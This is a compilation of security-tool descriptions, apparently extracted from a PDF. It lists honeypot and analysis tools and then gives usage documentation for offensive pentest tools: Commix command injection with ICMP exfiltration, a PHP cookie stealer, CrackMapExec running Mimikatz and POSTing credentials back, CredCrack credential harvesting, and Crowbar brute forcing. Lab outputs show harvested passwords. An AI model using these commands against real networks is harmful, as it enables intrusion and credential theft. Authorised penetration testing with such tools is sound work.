Sebek in QEMU
Qebek - QEMU based Sebek. As Sebek, it is data
capture tool for high interaction honeypot
Malware Simulator
imalse - Integrated MALware Simulator and Emulator
Distributed sensor deployment
Smarthoneypot - custom honeypot intelligence
system that is simple to deploy and easy to manage
Modern Honey Network - Multi-snort and honeypot
sensor management, uses a network of VMs, small
footprint SNORT installations, stealthy dionaeas, and
a centralized server for management
ADHD - Active Defense Harbinger Distribution
(ADHD) is a Linux distro based on Ubuntu LTS. It
comes with many tools aimed at active defense
preinstalled and configured
Network Analysis Tool
Tracexploit - replay network packets
Log anonymizer
LogAnon - log anonymization library that helps
having anonymous logs consistent between logs and
network captures
server
Honeysink - open source network sinkhole that
provides a mechanism for detection and prevention
of malicious traffic on a given network
Botnet traffic detection
dnsMole - analyse dns traffic, and to potentionaly
detect botnet C&C server and infected hosts
Low interaction honeypot (router back door)
Honeypot-32764 - Honeypot for router backdoor
(TCP 32764)
honeynet farm traffic redirector
Honeymole - eploy multiple sensors that redirect
traffic to a centralized collection of honeypots
HTTPS Proxy
mitmproxy - allows traffic flows to be intercepted,
inspected, modified and replayed
spamtrap
SendMeSpamIDS.py Simple SMTP fetch all IDS and
analyzer
System instrumentation
Sysdig - open source, system-level exploration:
capture system state and activity from a running
Linux instance, then save, filter and analyze
Honeypot for USB-spreading malware
Ghost-usb - honeypot for malware that propagates
via USB storage devices
Data Collection
Kippo2MySQL - extracts some very basic stats from
Kippos text-based log files (a mess to analyze!) and
inserts them in a MySQL database
Kippo2ElasticSearch - Python script to transfer data
from a Kippo SSH honeypot MySQL database to an
ElasticSearch instance (server or cluster)
Passive network audit framework parser
pnaf - Passive Network Audit Framework
VM Introspection
VIX virtual machine introspection toolkit - VMI toolkit
for Xen, called Virtual Introspection for Xen (VIX)
vmscope - Monitoring of VM-based High-Interaction
Honeypots
vmitools - C library with Python bindings that makes it
easy to monitor the low-level details of a running
virtual machine
Binary debugger
Hexgolems - Schem Debugger Frontend - A
debugger frontend
Hexgolems - Pint Debugger Backend - A debugger
backend and LUA wrapper for PIN
Mobile Analysis Tool
APKinspector - APKinspector is a powerful GUI tool

for analysts to analyze the Android applications
Androguard - Reverse engineering, Malware and
goodware analysis of Android applications ... and
more
Low interaction honeypot
Honeypoint - platform of distributed honeypot
technologies
Honeyperl - Honeypot software based in Perl with
plugins developed for many functions like : wingates,
telnet, squid, smtp, etc
Honeynet data fusion
HFlow2 - data coalesing tool for honeynet/network
analysis
Server
LaBrea - takes over unused IP addresses, and
creates virtual servers that are attractive to worms,
hackers, and other denizens of the Internet.
Kippo - SSH honeypot
KFSensor - Windows based honeypot Intrusion
Detection System (IDS)
Honeyd Also see more honeyd tools
Glastopf - Honeypot which emulates thousands of
vulnerabilities to gather data from attacks targeting
web applications
DNS Honeypot - Simple UDP honeypot scripts
Conpot - ow interactive server side Industrial Control
Systems honeypot
Bifrozt - High interaction honeypot solution for Linux
based systems
Beeswarm - Honeypot deployment made easy
Bait and Switch - redirects all hostile traffic to a
honeypot that is partially mirroring your production
system
Artillery - open-source blue team tool designed to
protect Linux and Windows operating systems
through multiple methods

Amun - vulnerability emulation honeypot
VM cloaking script
Antivmdetect - Script to create templates to use with
VirtualBox to make vm detection harder
IDS signature generation
Honeycomb
lookup service for AS-numbers and prefixes
CC2ASN
Web interface (for Thug)
Rumal - Thug's Ruml: a Thug's dress & weapon
Data Collection / Data Sharing
HPfriends - data-sharing platform
HPFeeds - lightweight authenticated publishsubscribe protocol
Distributed spam tracking
Project Honeypot
Python bindings for libemu
Pylibemu - A Libemu Cython wrapper
Controlled-relay spam honeypot
Shiva - Spam Honeypot with Intelligent Virtual
Analyzer
Shiva The Spam Honeypot Tips And Tricks For
Getting It Up And Running
Visualization Tool
Glastopf Analytics
Afterglow Cloud
Afterglow
central management tool
PHARM
Network connection analyzer
Impost
Virtual Machine Cloaking
VMCloak
Honeypot deployment
Modern Honeynet Network
SurfIDS
Automated malware analysis system
Cuckoo
Anubis
Hybrid Analysis
Low interaction
mwcollectd
Low interaction honeypot on USB stick
Honeystick
Honeypot extensions to Wireshark
Whireshark Extensions
Data Analysis Tool
HpfeedsHoneyGraph
Acapulco
Telephony honeypot
Zapping Rachel
Client
Pwnypot
MonkeySpider
Capture-HPC-NG
Wepawet
URLQuery
Trigona
Thug
Shelia
PhoneyC
Jsunpack-n
HoneyC
HoneyBOT
CWSandbox / GFI Sandbox
Capture-HPC-Linux
Capture-HPC
Andrubis
Visual analysis for network traffic
ovizart
Binary Management and Analysis Framework
Viper
Honeypot
Single-honeypot
Honeyd For Windows
IMHoneypot
Deception Toolkit
PDF document inspector
peepdf
Distribution system
Thug Distributed Task Queuing
HoneyClient Management
HoneyWeb
Network Analysis
HoneyProxy
Hybrid low/high interaction honeypot
HoneyBrid
Sebek on Xen
xebek
SSH Honeypot
Kojoney
Cowrie
Glastopf data analysis
Glastopf Analytics
Distributed sensor project
DShield Web Honeypot Project
Distributed Web Honeypot Project
a pcap analyzer
Honeysnap
Client Web crawler
HoneySpider Network
network traffic redirector
Honeywall
Honeypot Distribution with mixed content
HoneyDrive
Honeypot sensor
Dragon Research Group Distro
Honeeepi - Honeeepi is a honeypot sensor on

Raspberry Pi which based on customized Raspbian
OS.
File carving
TestDisk & PhotoRec
File and Network Threat Intelligence
VirusTotal
data capture
Sebek
SSH proxy
HonSSH
Anti-Cheat
Minecraft honeypot
behavioral analysis tool for win32
Capture BAT
Live CD
DAVIX
Spamtrap
Spampot.py
Spamhole
spamd
Mail::SMTP::Honeypot - perl module that appears to
provide the functionality of a standard SMTP server
Commercial honeynet
Specter
Netbait
Server (Bluetooth)
Bluepot
Dynamic analysis of Android apps
Droidbox
Dockerized Low Interaction packaging
Manuka
Dockerized Thug
Dockerpot A docker based honeypot.
Docker honeynet Several Honeynet tools set up for
Docker containers
Network analysis
Quechua
Sebek data visualization
Sebek Dataviz
SIP Server
Artemnesia VoIP
Botnet C2 monitoring
botsnoopd
low interaction
mysqlpot
Malware collection
Honeybow
HONEYD TOOLS
Honeyd plugin
Honeycomb
Honeyd viewer
Honeyview
Honeyd to MySQL connector
Honeyd2MySQL
A script to visualize statistics from honeyd
Honeyd-Viz
Honeyd UI
Honeyd configuration GUI - application used to
configure the honeyd daemon and generate
configuration files
Honeyd stats
Honeydsum.pl
NETWORK AND ARTIFACT ANALYSIS
Sandbox
RFISandbox - a PHP 5.x script sandbox built on top
of funcall
dorothy2 - A malware/botnet analysis framework
written in Ruby
COMODO automated sandbox
Argos - An emulator for capturing zero-day attacks
Sandbox-as-a-Service
malwr.com - free malware analysis service and
community
detux.org - Multiplatform Linux Sandbox
Joebox Cloud - analyzes the behavior of malicious
files including PEs, PDFs, DOCs, PPTs, XLSs,
APKs, URLs and MachOs on Windows, Android and
Mac OS X for suspicious activities
DATA TOOLS
Front Ends
Tango - Honeypot Intelligence with Splunk
Django-kippo - Django App for kippo SSH Honeypot
Wordpot-Frontend - a full featured script to visualize
statistics from a Wordpot honeypot -ShockpotFrontend - a full featured script to visualize statistics
from a Shockpot honeypot
Visualization
HoneyMap - Real-time websocket stream of GPS

events on a fancy SVG world map
HoneyMalt - Maltego tranforms for mapping
Honeypot systems
Source
COMMIX - AUTOMATED ALL-IN-ONE OS COMMAND
INJECTION AND EXPLOITATION TOOL
Commix (short for [comm]and [i]njection e[x]ploiter) has a

simple environment and it can be used, from web developers,
penetration testers or even security researchers to test web
applications with the view to find bugs, errors or vulnerabilities
related to command injection attacks. By using this tool, it is
very easy to find and exploit a command injection vulnerability
in a certain vulnerable parameter or string. Commix is written in
Python programming language.
Requirements
Python version 2.6.x or 2.7.x is required for running this

program.
Installation
Download commix by cloning the Git repository:

git clone https://github.com/stasinopoulos/commix.git
commix
Usage
Usage: python commix.py [options]

Options
-h, --help Show help and exit.

--verbose
Enable the verbose mode.
--install
Install 'commix' to your system.
--version
Show version number and exit.
--update
Check for updates (apply if any)
and exit.
Target
This options has to be provided, to define the target URL.
--url=URL
Target URL.
--url-reload
Reload target URL after command
execution.
Request
These options can be used, to specify how to connect to the
target
URL.
--host=HOST
HTTP Host header.
--referer=REFERER
HTTP Referer header.
--user-agent=AGENT
HTTP User-Agent header.
--cookie=COOKIE
HTTP Cookie header.
--headers=HEADERS
Extra headers (e.g.
'Header1:Value1\nHeader2:Value2').
--proxy=PROXY
Use a HTTP proxy (e.g.
'127.0.0.1:8080').
--auth-url=AUTH_..
Login panel URL.
--auth-data=AUTH..
Login parameters and data.
--auth-cred=AUTH..
HTTP Basic Authentication credentials
(e.g.
'admin:admin').
Injection
These options can be used, to specify which parameters to
inject and
to provide custom injection payloads.
--data=DATA
POST data to inject (use
'INJECT_HERE' tag).
--suffix=SUFFIX
Injection payload suffix string.
--prefix=PREFIX
Injection payload prefix string.
--technique=TECH
Specify a certain injection
technique : 'classic',
'eval-based', 'time-based' or 'filebased'.
--maxlen=MAXLEN
The length of the output on time-
based technique
(Default: 10000 chars).
--delay=DELAY
Set Time-delay for time-based and
file-based
techniques (Default: 1 sec).
--base64
Use Base64 (enc)/(de)code trick to
prevent falsepositive results.

--tmp-path=TMP_P..
Set remote absolute path of temporary
files directory.
--icmp-exfil=IP_..
Use the ICMP exfiltration technique
(e.g.
'ip_src=192.168.178.1,ip_dst=192.168.178.3').
Usage Examples
Exploiting Damn Vulnerable Web App

python commix.py --url="http://192.168.178.58/DVWA-1.0.8/
vulnerabilities/exec/#" -data="ip=INJECT_HERE&submit=submit" -cookie="security=medium;
PHPSESSID=nq30op434117mo7o2oe5bl7is4"
Exploiting php-Charts 1.0 using injection payload suffix &

prefix string:
python commix.py --url="http://192.168.178.55/phpcharts_v1.0/wizard/index.php?type=INJECT_HERE" -prefix="//" --suffix="'"
Exploiting OWASP Mutillidae using Extra headers and

HTTP proxy:
python commix.py --url="http://192.168.178.46/mutillidae/
index.php?popUpNotificationCode=SL5&page=dns-lookup.php"
--data="target_host=INJECT_HERE" --headers="AcceptLanguage:fr\nETag:123\n" --proxy="127.0.0.1:8081"
Exploiting Persistence using ICMP exfiltration technique :

su -c "python commix.py --url="http://192.168.178.8/
debug.php" --data="addr=127.0.0.1" --icmpexfil="ip_src=192.168.178.5,ip_dst=192.168.178.8""
DownloadCommix
COOKIES MANAGER - SIMPLE COOKIE STEALER
A simple program in PHP to help with XSS vulnerability in this

program are the following:
[+] Cookie Stealer with TinyURL Generator
[+] Can you see the cookies that brings back a page
[+] Can create cookies with information they want
[+] Hidden to login to enter Panel use ?poraca to find the login
A video with examples of use :
An error occurred.
DownloadCookies Manager
COOKIESCANNER - TOOL TO CHECK THE COOKIE FLAG
FOR A MULTIPLE SITES
Tool to do more easy the web scan proccess to check if the

secure and HTTPOnly flags are enabled in the cookies (path
and expires too).
This tools allows probe multiple urls through a input file, by a

google domain (looking in all subdomains) or by a unique url.
Also, supports multiple output like json, xml and csv.
FEATURES:
Multiple options for output (and export using >). xml, json,
csv, grepable
Check the flags in multiple sites by a file input (one per
line). This is very useful for pentesters when they want
check the flags in multiple sites.
Google search. Search in google all subdomains and
check the cookies for each domain.
Colors for the normal output.
USAGE
Usage: cookiescanner.py [options]
Example: ./cookiescanner.py -i ips.txt
Options:
-h, --help
show this help message and exit
-i INPUT, --input=INPUT
File input with the list of
webservers
-I, --info
More info
-u URL, --url=URL
URL
-f FORMAT, --format=FORMAT
Output format (json, xml, csv,
normal, grepable)
--nocolor
format output)
Disable color (for the normal
-g GOOGLE, --google=GOOGLE
Search in google by domain
REQUIREMENTS
requests >= 2.8.1
BeautifulSoup >= 4.2.1
INSTALL REQUIREMENTS
pip3 install --upgrade -r requirements.txt
DownloadCookiescanner
COWRIE - SSH HONEYPOT
Cowrie is a medium interaction SSH honeypot designed to log

brute force attacks and, most importantly, the entire shell
interaction performed by the attacker.
Cowrie is directly based on Kippo by Upi Tamminen (desaster).
Features
Some interesting features:

Fake filesystem with the ability to add/remove files. A full
fake filesystem resembling a Debian 5.0 installation is
included
Possibility of adding fake file contents so the attacker can
'cat' files such as /etc/passwd. Only minimal file contents

are included
Session logs stored in an UML Compatible format for easy
replay with original timings
Cowrie saves files downloaded with wget/curl or uploaded
with SFTP and scp for later inspection
Additional functionality over standard kippo:
SFTP and SCP support for file upload
Support for SSH exec commands
Logging of direct-tcp connection attempts (ssh proxying)
Logging in JSON format for easy processing in log
management solutions
Many, many additional commands
Requirements
Software required:
An operating system (tested on Debian, CentOS,
FreeBSD and Windows 7)
Python 2.5+
Twisted 8.0+
PyCrypto
pyasn1
Zope Interface
Files of interest:
dl/ - files downloaded with wget are stored here

log/cowrie.log - log/debug output
log/cowrie.json - transaction output in JSON format
log/tty/ - session logs
utils/playlog.py - utility to replay session logs
utils/createfs.py - used to create fs.pickle
data/fs.pickle - fake filesystem
honeyfs/ - file contents for the fake filesystem - feel free to
copy a real system here
DownloadCowrie
CRACKMAPEXEC - A SWISS ARMY KNIFE FOR
PENTESTING WINDOWS/ACTIVE DIRECTORY
ENVIRONMENTS
CrackMapExec is your one-stop-shop for pentesting Windows/

Active Directory environments!
From enumerating logged on users and spidering SMB shares

to executing psexec style attacks and auto-injecting Mimikatz
into memory using Powershell!
The biggest improvements over the above tools are:
Pure Python script, no external tools required
Fully concurrent threading
Uses ONLY native WinAPI calls for discovering sessions,
users, dumping SAM hashes etc...
Opsec safe (no binaries are uploaded to dump clear-text
credentials, inject shellcode etc...)
Installation on Kali Linux
Run pip install --upgrade -r requirements.txt

Usage
______ .______
___ .___
___.
_______
______
||
\/
,----'|
,----'
|_)
/
|
|
|
/
/
/_\
_______ ___
||
____|\
___
|/
\ /
/ |
,----'|
'
| |
|__
|__
|_)
/
/ |
/_\
___/
__|
|
>
<
<
|
|
`----.|
|\
_____
____ |
__
|\/|
______
.______
____| /
__|
___
___
`----.
\----. /
\
_____
|
\
|
`----.|
|____
\______|| _| `._____|/__/
__|
|__| /__/
\__\
\__\ | _|
\______||__|\__\ |
|_______|/__/ \__\ |
_______| \______|
Swiss army knife for pentesting Windows/
Active Directory environments | @byt3bl33d3r
Powered by Impacket https://
github.com/CoreSecurity/impacket (@agsolino)
Inspired by:
@ShawnDEvans's smbmap https://
github.com/ShawnDEvans/smbmap
@gojhonny's CredCrack https://
github.com/gojhonny/CredCrack
@pentestgeek's smbexec
https://github.com/pentestgeek/smbexec
positional arguments:
target
The target range, CIDR identifier
or file containing targets

optional arguments:
-h, --help
-t THREADS
Set how many concurrent threads
to use
-u USERNAME
Username, if omitted null session
assumed
-p PASSWORD
Password
-H HASH
NTLM hash
-n NAMESPACE
Namespace name (default //./root/
cimv2)
-d DOMAIN
Domain name
-s SHARE
Specify a share (default: C$)
-P {139,445}
SMB port (default: 445)
-v
Enable verbose output
Credential Gathering:
Options for gathering credentials
--sam
Dump SAM hashes from target
systems
--mimikatz
Run Invoke-Mimikatz on target
systems
--ntds {ninja,vss,drsuapi}
Dump the NTDS.dit from target DCs
using the specifed method
(drsuapi is the fastest)
Mapping/Enumeration:
Options for Mapping/Enumerating
--shares
List shares
--sessions
Enumerate active sessions
--users
Enumerate users
--lusers
Enumerate logged on users
--wmi QUERY
Issues the specified WMI query
Account Bruteforcing:
Options for bruteforcing SMB accounts

--bruteforce USER_FILE PASS_FILE
Your wordlists containing
Usernames and Passwords
--exhaust
Don't stop on first valid account
found
Spidering:
Options for spidering shares
--spider FOLDER
Folder to spider (defaults to
share root dir)

--pattern PATTERN
Pattern to search for in
filenames and folders

--patternfile PATTERNFILE
File containing patterns to
search for
--depth DEPTH
Spider recursion depth (default:
1)
Command Execution:
Options for executing commands
--execm {atexec,wmi,smbexec}
Method to execute the command
(default: smbexec)
-x COMMAND
Execute the specified command
-X PS_COMMAND
Excute the specified powershell
command
Shellcode/EXE/DLL injection:
Options for injecting Shellcode/EXE/DLL's using
PowerShell
--inject {exe,shellcode,dll}
Inject Shellcode, EXE or a DLL
--path PATH
Path to the Shellcode/EXE/DLL you
want to inject on the target systems

--procid PROCID
Process ID to inject the
Shellcode/EXE/DLL into (if omitted, will inject within

the running PowerShell process)
--exeargs EXEARGS
Arguments to pass to the EXE
being reflectively loaded (ignored if not injecting an

EXE)
Filesystem interaction:
Options for interacting with filesystems
--list PATH
List contents of a directory
--download PATH
Download a file from the remote
systems
--upload SRC DST
Upload a file to the remote
systems
--delete PATH
Delete a remote file
There's been an awakening... have you felt it?
Examples
The most basic usage: scans the subnet using 100 concurrent
threads:
#~ python crackmapexec.py -t 100 172.16.206.0/24
[+] 172.16.206.132:445 is running Windows 6.1 Build 7601
(name:DRUGCOMPANY-PC) (domain:DRUGCOMPANY-PC)
(name:DRUGOUTCOVE-PC) (domain:DRUGOUTCOVE-PC)
[+] 172.16.206.130:445 is running Windows 10.0 Build
10240 (name:DESKTOP-QDVNP6B) (domain:DESKTOP-QDVNP6B)
Let's enumerate available shares:

#~
python crackmapexec.py -t 100 172.16.206.0/24 -u
username -p password --shares

[+] 172.16.206.130:445 DESKTOP-QDVNP6B Available shares:
SHARE
Permissions
-----
-----------
ADMIN$
READ, WRITE
IPC$
NO ACCESS
C$
READ, WRITE
[+] 172.16.206.133:445 DRUGOUTCOVE-PC Available shares:

SHARE
Permissions
-----
-----------
Users
READ, WRITE
ADMIN$
READ, WRITE
IPC$
NO ACCESS
C$
READ, WRITE
[+] 172.16.206.132:445 DRUGCOMPANY-PC Available shares:
SHARE
Permissions
-----
-----------
Users
READ, WRITE
ADMIN$
READ, WRITE
IPC$
NO ACCESS
C$
READ, WRITE
Let's execute some commands on all systems concurrently:

#~ python crackmapexec.py -t 100 172.16.206.0/24 -u
username -p password -x whoami
[+] 172.16.206.132:445 DRUGCOMPANY-PC Executed specified
command via SMBEXEC
nt authority\system
[+] 172.16.206.130:445 DESKTOP-QDVNP6B Executed specified
command via SMBEXEC
nt authority\system
[+] 172.16.206.133:445 DRUGOUTCOVE-PC Executed specified
command via SMBEXEC
nt authority\system
Same as above only using WMI as the code execution method:

username -p password --execm wmi -x whoami

[+] 172.16.206.132:445 DRUGCOMPANY-PC Executed specified
command via WMI
drugcompany-pc\administrator
[+] 172.16.206.133:445 DRUGOUTCOVE-PC Executed specified
command via WMI
drugoutcove-pc\administrator
[+] 172.16.206.130:445 DESKTOP-QDVNP6B Executed specified
command via WMI
desktop-qdvnp6b\drugdealer
Use an IEX cradle to run Invoke-Mimikatz.ps1 on all systems

concurrently (PS script gets hosted automatically with an HTTP
server), Mimikatz's output then gets POST'ed back to our HTTP
server, saved to a log file and parsed for clear-text credentials:
username -p password --mimikatz
[*] Press CTRL-C at any time to exit
[*] Note: This might take some time on large networks! Go
grab a redbull!
172.16.206.130 - - [19/Aug/2015 18:57:40] "GET /Invoke-
Mimikatz.ps1 HTTP/1.1" 200 172.16.206.133 - - [19/Aug/2015 18:57:40] "GET /InvokeMimikatz.ps1 HTTP/1.1" 200 172.16.206.132 - - [19/Aug/2015 18:57:41] "GET /InvokeMimikatz.ps1 HTTP/1.1" 200 172.16.206.133 - - [19/Aug/2015 18:57:45] "POST / HTTP/
1.1" 200 [+] 172.16.206.133 Found plain text creds! Domain:
drugoutcove-pc Username: drugdealer Password: IloveMETH!@
$
[*] 172.16.206.133 Saved POST data to
Mimikatz-172.16.206.133-2015-08-19_18:57:45.log
172.16.206.130 - - [19/Aug/2015 18:57:47] "POST / HTTP/
1.1" 200 [*] 172.16.206.130 Saved POST data to
Mimikatz-172.16.206.130-2015-08-19_18:57:47.log
172.16.206.132 - - [19/Aug/2015 18:57:48] "POST / HTTP/
1.1" 200 [+] 172.16.206.132 Found plain text creds! Domain:
drugcompany-PC Username: drugcompany Password: IloveWEED!
@#
[+] 172.16.206.132 Found plain text creds! Domain:
DRUGCOMPANY-PC Username: drugdealer Password:
D0ntDoDrugsKIDS!@#
[*] 172.16.206.132 Saved POST data to
Mimikatz-172.16.206.132-2015-08-19_18:57:48.log
Lets Spider the C$ share starting from the Users folder for the
pattern password in all files and directories (concurrently):
username -p password --spider Users --depth 10 --pattern
password

[+] 172.16.206.132:445 DRUGCOMPANY-PC Started spidering
[+] 172.16.206.133:445 DRUGOUTCOVE-PC Started spidering
[+] 172.16.206.130:445 DESKTOP-QDVNP6B Started spidering
//172.16.206.132/Users/drugcompany/AppData/Roaming/
Microsoft/Windows/Recent/supersecrepasswords.lnk
//172.16.206.132/Users/drugcompany/AppData/Roaming/
Microsoft/Windows/Recent/supersecretpasswords.lnk
//172.16.206.132/Users/drugcompany/Desktop/
supersecretpasswords.txt
[+] 172.16.206.132:445 DRUGCOMPANY-PC Done spidering
(Completed in 7.0349509716)
//172.16.206.133/Users/drugdealerboss/Documents/
omgallthepasswords.txt
[+] 172.16.206.133:445 DRUGOUTCOVE-PC Done spidering
(Completed in 16.2127850056)
//172.16.206.130/Users/drugdealer/AppData/Roaming/
Microsoft/Windows/Recent/superpasswords.txt.lnk
//172.16.206.130/Users/drugdealer/Desktop/
superpasswords.txt.txt
[+] 172.16.206.130:445 DESKTOP-QDVNP6B Done spidering
(Completed in 38.6000130177)
For all available options, just run: python crackmapexec.py -help
Download CrackMapExec
CREDCRACK - FAST AND STEALTHY CREDENTIAL
HARVESTER
CredCrack is a fast and stealthy credential harvester. It

exfiltrates credentials recusively in memory and in the clear.
Upon completion, CredCrack will parse and output the
credentials while identifying any domain administrators
obtained. CredCrack also comes with the ability to list and

enumerate share access and yes, it is threaded!
CredCrack has been tested and runs with the tools found
natively in Kali Linux. CredCrack solely relies on having
PowerSploit's "Invoke-Mimikatz.ps1" under the /var/www
directory.
Help
usage: credcrack.py [-h] -d DOMAIN -u USER [-f FILE] [-r
RHOST] [-es]
[-l LHOST] [-t THREADS]
CredCrack - A stealthy credential harvester by Jonathan
Broche (@g0jhonny)
optional arguments:
-h, --help
-f FILE, --file FILE
File containing IPs to harvest
creds from. One IP per

line.
-r RHOST, --rhost RHOST
Remote host IP to harvest creds
from.
-es, --enumshares
Examine share access on the
remote IP(s)
-l LHOST, --lhost LHOST
Local host IP to launch scans
from.
-t THREADS, --threads THREADS
Number of threads (default: 10)
Required:
-d DOMAIN, --domain DOMAIN
Domain or Workstation
-u USER, --user USER
Domain username
Examples:
./credcrack.py -d acme -u bob -f hosts -es
./credcrack.py -d acme -u bob -f hosts -l 192.168.1.102 t 20
Examples
Enumerating Share Access

./credcrack.py -r 192.168.1.100 -d acme -u bob --es
Password:
-------------------------------------------------------------------CredCrack v1.0 by Jonathan Broche (@g0jhonny)
-------------------------------------------------------------------[*] Validating 192.168.1.102
[*] Validating 192.168.1.103
[*] Validating 192.168.1.100
----------------------------------------------------------------
192.168.1.102 - Windows 7 Professional 7601 Service Pack

1
---------------------------------------------------------------OPEN
\\192.168.1.102\ADMIN$
OPEN
\\192.168.1.102\C$
---------------------------------------------------------------192.168.1.103 - Windows Vista (TM) Ultimate 6002 Service

Pack 2
---------------------------------------------------------------OPEN
\\192.168.1.103\ADMIN$
OPEN
\\192.168.1.103\C$
CLOSED
\\192.168.1.103\F$
---------------------------------------------------------------192.168.1.100 - Windows Server 2008 R2 Enterprise 7601

Service Pack 1
----------------------------------------------------------------
CLOSED
\\192.168.1.100\ADMIN$
CLOSED
\\192.168.1.100\C$
OPEN
\\192.168.1.100\NETLOGON
OPEN
\\192.168.1.100\SYSVOL
[*] Done! Completed in 0.8s
Harvesting credentials
./credcrack.py -f hosts -d acme -u bob -l 192.168.1.100
Password:
-------------------------------------------------------------------CredCrack v1.0 by Jonathan Broche (@g0jhonny)

-------------------------------------------------------------------[*] Setting up the stage
[*] Validating 192.168.1.102
[*] Validating 192.168.1.103
[*] Querying domain admin group from 192.168.1.102
[*] Harvesting credentials from 192.168.1.102
[*] Harvesting credentials from 192.168.1.103
The loot has arrived...
__________
/\____;;___\
| /
`. ())oo() .
|\(%()*^^()^\
%| |-%-------|
% \ | %
%
))
\|%________|
[*] Host: 192.168.1.102 Domain: ACME User: jsmith

Password: Good0ljm1th
[*] Host: 192.168.1.103 Domain: ACME User: daguy
Password: P@ssw0rd1!
1 domain administrators found and highlighted in
yellow above!
[*] Cleaning up
[*] Done! Loot may be found under /root/CCloot folder
[*] Completed in 11.3s
DownloadCredCrack
CREDMAP - THE CREDENTIAL MAPPER
Credmap is an open source tool that was created to bring
awareness to the dangers of credential reuse. It is capable of

testing supplied user credentials on several known websites to
test if the password has been reused on any of these.
HELP MENU
Usage: credmap.py --email EMAIL | --user USER | --load
LIST [options]
Options:
-h/--help
-v/--verbose
display extra output information
-u/--username=USER..
set the username to test with
-p/--password=PASS..
set the password to test with
-e/--email=EMAIL
set an email to test with
-l/--load=LOAD_FILE
load list of credentials in
format USER:PASSWORD
-x/--exclude=EXCLUDE
exclude sites from testing
-o/--only=ONLY
test only listed sites
-s/--safe-urls
only test sites that use HTTPS.
-i/--ignore-proxy
ignore system default HTTP proxy
--proxy=PROXY
set proxy (e.g.
"socks5://192.168.1.2:9050")
--list
list available sites to test with
EXAMPLES
./credmap.py --username janedoe --email janedoe@email.com
./credmap.py -u johndoe -e johndoe@email.com --exclude
"github.com, live.com"
./credmap.py -u johndoe -p abc123 -vvv --only
"linkedin.com, facebook.com"
./credmap.py -e janedoe@example.com --verbose --proxy

"https://127.0.0.1:8080"
./credmap.py --load list.txt
./credmap.py --list
PREREQUISITES
To get started, you will need Python 2.6+ (previous versions

may work as well, however I haven't tested them)
Python 2.6+
Git (Optional)
RUNNING THE PROGRAM
To run credmap, simply execute the main script "credmap.py".

$ python credmap.py -h
VIDEO
An error occurred.
Downloadcredmap
CROUTON - CHROMIUM OS UNIVERSAL CHROOT
ENVIRONMENT
crouton is a set of scripts that bundle up into an easy-to-use,

Chromium OS-centric chroot generator. Currently Ubuntu and
Debian are supported (using debootstrap behind the scenes),
but "Chromium OS Debian, Ubuntu, and Probably Other
Distros Eventually Chroot Environment" doesn't acronymize as
well (crodupodece is admittedly pretty fun to say, though).
"crouton"...an acronym?
It stands for ChRomium Os Universal chrooT envirONment ...or

something like that. Do capitals really matter if caps-lock has
been (mostly) banished, and the keycaps are all lower-case?
Moving on...
Who's this for?
Anyone who wants to run straight Linux on their Chromium OS
device, and doesn't care about physical security. You're also

better off having some knowledge of Linux tools and the
command line in case things go funny, but it's not strictly
necessary.
What's a chroot?
Like virtualization, chroots provide the guest OS with their own,

segregated file system to run in, allowing applications to run in
a different binary environment from the host OS. Unlike
virtualization, you are not booting a second OS; instead, the
guest OS is running using the Chromium OS system. The
benefit to this is that there is zero speed penalty since
everything is run natively, and you aren't wasting RAM to boot
two OSes at the same time. The downside is that you must be
running the correct chroot for your hardware, the software must
be compatible with Chromium OS's kernel, and machine
resources are inextricably tied between the host Chromium OS
and the guest OS. What this means is that while the chroot
cannot directly access files outside of its view, it can access all
of your hardware devices, including the entire contents of
memory. A root exploit in your guest OS will essentially have
unfettered access to the rest of Chromium OS.
...but hey, you can run TuxRacer!
Prerequisites
You need a device running Chromium OS that has been

switched to developer mode.
For instructions on how to do that, go to this Chromium OS wiki
page, click on your device model and follow the steps in the
Entering Developer Mode section.
Note that developer mode, in its default configuration, is
completely insecure, so don't expect a password in your chroot
to keep anyone from your data. crouton does support

encrypting chroots, but the encryption is only as strong as the
quality of your passphrase. Consider this your warning.
It's also highly recommended that you install the crouton
extension, which, when combined with the extension or xiwi
targets, provides much improved integration with Chromium
OS.
That's it! Surprised?
Usage
crouton is a powerful tool, and there are a lot of features, but

basic usage is as simple as possible by design.
If you're just here to use crouton, you can grab the latest
release from https://goo.gl/fd3zc. Download it, pop open a shell
(Ctrl+Alt+T, type shell and hit enter), and run sh ~/
Downloads/crouton to see the help text. See the "examples"
section for some usage examples.
If you're modifying crouton, you'll probably want to clone or
download the repo and then either run installer/main.sh
directly, or use make to build your very own crouton. You can
also download the latest release, cd into the Downloads folder,
and run sh crouton -x to extract out the juicy scripts
contained within, but you'll be missing build-time stuff like the
Makefile.
crouton uses the concept of "targets" to decide what to install.
While you will have apt-get in your chroot, some targets may
need minor hacks to avoid issues when running in the chrooted
environment. As such, if you expect to want something that is
fulfilled by a target, install that target when you make the chroot
and you'll have an easier time. Don't worry if you forget to
include a target; you can always update the chroot later and
add it. You can see the list of available targets by running sh
~/Downloads/crouton -t help.
Once you've set up your chroot, you can easily enter it using
the newly-installed enter-chroot command, or one of the
target-specific start* commands. Ta-da! That was easy.
Read more here.
DownloadCrouton
CROWBAR - BRUTE FORCING TOOL FOR PENTESTS
Crowbar (crowbar) is brute forcing tool that can be used during

penetration tests. It is developed to brute force some protocols
in a different manner according to other popular brute forcing
tools. As an example, while most brute forcing tools use
username and password for SSH brute force, Crowbar uses
SSH key. So SSH keys, that are obtained during penetration
tests, can be used to attack other SSH servers.
Currently Crowbar supports
OpenVPN
SSH private key authentication
VNC key authentication
Remote Desktop Protocol (RDP) with NLA support
Installation
First you shoud install dependencies

# apt-get install openvpn freerdp-x11 vncviewer
Then get latest version from github

# git clone https://github.com/galkan/crowbar
Attention: Rdp depends on your Kali version. It may be xfreerdp

for the latest version.
Usage
-h: Shows help menu.

-b: Target service. Crowbar now supports vnckey, openvpn,
sshkey, rdp.
-s: Target ip address.
-S: File name which is stores target ip address.
-u: Username.
-U: File name which stores username list.
-n: Thread count.
-l: File name which stores log. Deafault file name is crwobar.log
which is located in your current directory
-o: Output file name which stores the successfully attempt.
-c: Password.
-C: File name which stores passwords list.
-t: Timeout value.
-p: Port number
-k: Key file full path.
-m: Openvpn configuration file path
-d: Run nmap in order to discover whether the target port is
open or not. So that you can easily brute to target using
crowbar.
-v: Verbose mode which is shows all the attempts including fail.
If you want see all usage options, please use crowbar --help
DownloadCrowbar
CSRFT - CROSS SITE REQUEST FORGERIES

(EXPLOITATION) TOOLKIT
This project has been developed to exploit CSRF Web

vulnerabilities and provide you a quick and easy exploitation
